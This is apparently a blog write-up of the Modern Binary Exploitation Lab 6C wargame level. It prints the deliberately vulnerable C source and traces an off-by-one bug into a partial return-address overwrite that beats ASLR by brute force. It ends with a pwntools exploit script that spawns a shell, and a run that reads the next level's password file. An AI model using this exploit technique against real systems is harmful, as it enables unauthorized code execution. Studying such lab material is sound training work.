---
layout: post
title: Modern Binary Exploitation - Lab 6C
published: True
---

For this lab, we are given a program and its corresponding source code:

{% highlight C %}
/*
Exploitation with ASLR
Lab C

 gcc -pie -fPIE -fno-stack-protector -o lab6C lab6C.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct savestate {
    char tweet[140];
    char username[40];
    int msglen;
} save;

void set_tweet(struct savestate *save );
void set_username(struct savestate * save);

/* debug functionality, not used in production */
void secret_backdoor()
{
    char cmd[128];

    /* reads a command and executes it */
    fgets(cmd, 128, stdin);
    system(cmd);

    return;
}

void handle_tweet()
{
    struct savestate save;

    /* Initialize our save state to sane values. */
    memset(save.username, 0, 40);
    save.msglen = 140;

    /* read a username and tweet from the user */
    set_username(&save);
    set_tweet(&save);

    printf(">: Tweet sent!\n");
    return;
}

void set_tweet(struct savestate *save )
{
    char readbuf[1024];
    memset(readbuf, 0, 1024);

    printf(">: Tweet @Unix-Dude\n");
    printf(">>: ");

    /* read a tweet from the user, safely copy it to struct */
    fgets(readbuf, 1024, stdin);
    strncpy(save->tweet, readbuf, save->msglen);

    return;
}

void set_username(struct savestate * save)
{
    int i;
    char readbuf[128];
    memset(readbuf, 0, 128);

    printf(">: Enter your username\n");
    printf(">>: ");

    /* Read and copy the username to our savestate */
    fgets(readbuf, 128, stdin);
    for(i = 0; i <= 40 && readbuf[i]; i++)
        save->username[i] = readbuf[i];

    printf(">: Welcome, %s", save->username);
    return;
}

int main(int argc, char * argv[])
{

    printf(
    "--------------------------------------------\n" \
    "|   ~Welcome to l33t-tw33ts ~    v.0.13.37 |\n" \
    "--------------------------------------------\n");

    /* make some tweets */
    handle_tweet();

    return EXIT_SUCCESS;
}
{% endhighlight %}

If we run `checksec`, we can see that NX and PIE are enabled.

{% highlight bash %}
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : Partial
{% endhighlight %}

Because PIE is enabled, the ELF executable base address is randomized. However, the offsets **within** the ELF executable remain the same.
We can verify this by running `vmmap` in `gdb` a couple of times.

**Run 1**
{% highlight bash %}
0xb7709000 0xb770a000 r-xp	/levels/lab06/lab6C
0xb770a000 0xb770b000 r--p	/levels/lab06/lab6C
0xb770b000 0xb770c000 rw-p	/levels/lab06/lab6C

gdb-peda$ p secret_backdoor
$1 = {<text variable, no debug info>} 0xb776272b <secret_backdoor>
{% endhighlight %}

**Run 2**
{% highlight bash %}
0xb7725000 0xb7726000 r-xp	/levels/lab06/lab6C
0xb7726000 0xb7727000 r--p	/levels/lab06/lab6C
0xb7727000 0xb7728000 rw-p	/levels/lab06/lab6C

gdb-peda$ p secret_backdoor
$2 = {<text variable, no debug info>} 0xb772572b <secret_backdoor>
{% endhighlight %}

Notice that the lower 3 nibbles of the `secret_backdoor` address are always the same!

## Vulnerability
We can see from the source code that there is a **off by one** error introduced in `set_username()` on this line:
{% highlight C %}
for(i = 0; i <= 40 && readbuf[i]; i++)
{% endhighlight%}

To fix it, we would have to change it to the following.
{%highlight C%}
for(i = 0; i < 40 && readbuf[i]; i++)
{%endhighlight%}

This mistake allows us to overwrite the byte adjacent to the `username[]` buffer in the `save` struct, which in this case, is the `msglen` variable.
If we overwrite this `msglen` variable with `0xc6`, we will later be able to `strncpy()` just enough bytes from stdin to do a partial overwrite of the lower two bytes of the saved EIP of `handle_tweet()`. 

If we compare the address of `main()` and the address of `secret_backdoor`, we see why we only need to overwrite the lower two bytes instead of the entire return address.

~~~
gdb-peda$ p main
$3 = {<text variable, no debug info>} 0xb77fd962 <main>
gdb-peda$ p secret_backdoor
$1 = {<text variable, no debug info>} 0xb77fd72b <secret_backdoor>
~~~

We can see that both of their most significant bytes are `0xb77fd` and that they only differ in the last 3 nibbles.
Also, we don't want to overwrite `msglen` with a value more than `0xc6` for 2 reasons.

First, we don't want to because of the way `strncpy()` works. 
Take a careful look at this line:

{% highlight C %}
strncpy(save->tweet, readbuf, save->msglen);
{%endhighlight%}
It is supposed to read `save->msglen` bytes of data from `readbuf` and write them to `save->tweet`.
However, because of how `strncpy()` works, if the length of `readbuf` is less than `save->msglen`, then `strncpy()` will pad additional null bytes to `save->tweet` to ensure that `save->msglen` bytes are written.

Additionally, we don't want to overwrite any more bytes than that because ASLR randomizes bits 13-20, or the middle two bytes, of the saved EIP. 
This means that unfortuantely, we won't know what bits 13-16 are, and need to brute force it. Overwriting `msglen` with `0xc7` would require us to bruteforce another nibble, so we just stick with overwriting the lower 2 bytes. 
  
**Saved EIP before overwrite**

~~~
0000| 0xbfe6859c --> 0xb77fd98a (<main+40>:	mov    eax,0x0)
~~~

**Saved EIP after overwrite**

~~~
0000| 0xbfe6859c --> 0xb77f572b ("rtoul_internal")
~~~

If we look at the address of `secret_backdoor()`, though, we notice that it does not match the address that we overwrote the saved EIP with. 

~~~
gdb-peda$ p secret_backdoor
$1 = {<text variable, no debug info>} 0xb77fd72b <secret_backdoor>
~~~

Again, that is because we need to bruteforce bits 13-16, and therefore, won't overwrite the saved EIP with the right address, 15 out of every 16 times.

Putting everything together, the following exploit, while not 100% reliable, will give us a shell if we run it a few times.

## Solution
{% highlight python %}
#!/usr/bin/env python

from pwn import *
import sys

def exploit(r):
  r.sendline("A"*40+"\xc6")
  r.sendline("A"*196+"\x2b\x57")
  r.sendline("/bin/sh")
  
  r.interactive()
if __name__ == "__main__":
  log.info("For remote: %s HOST PORT" % sys.argv[0])
  if len(sys.argv) > 1:
    r = remote(sys.argv[1], int(sys.argv[2]))
    exploit(r)
  else:
    r = process([ '/levels/lab06/lab6C'])
    print util.proc.pidof(r)
    #pause()
    exploit(r)
{% endhighlight %}

{% highlight bash %}
lab6C@warzone:/tmp/lab6C$ python solve.py 
[*] For remote: solve.py HOST PORT
[+] Starting program '/levels/lab06/lab6C': Done
[28202]
[*] Switching to interactive mode
--------------------------------------------
|   ~Welcome to l33t-tw33ts ~    v.0.13.37 |
--------------------------------------------
>: Enter your username
>>: >: Welcome, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?>: Tweet @Unix-Dude
>>: >: Tweet sent!
$
$ cat /home/lab6B/.pass
p4rti4l_0verwr1tes_r_3nuff
{% endhighlight %}

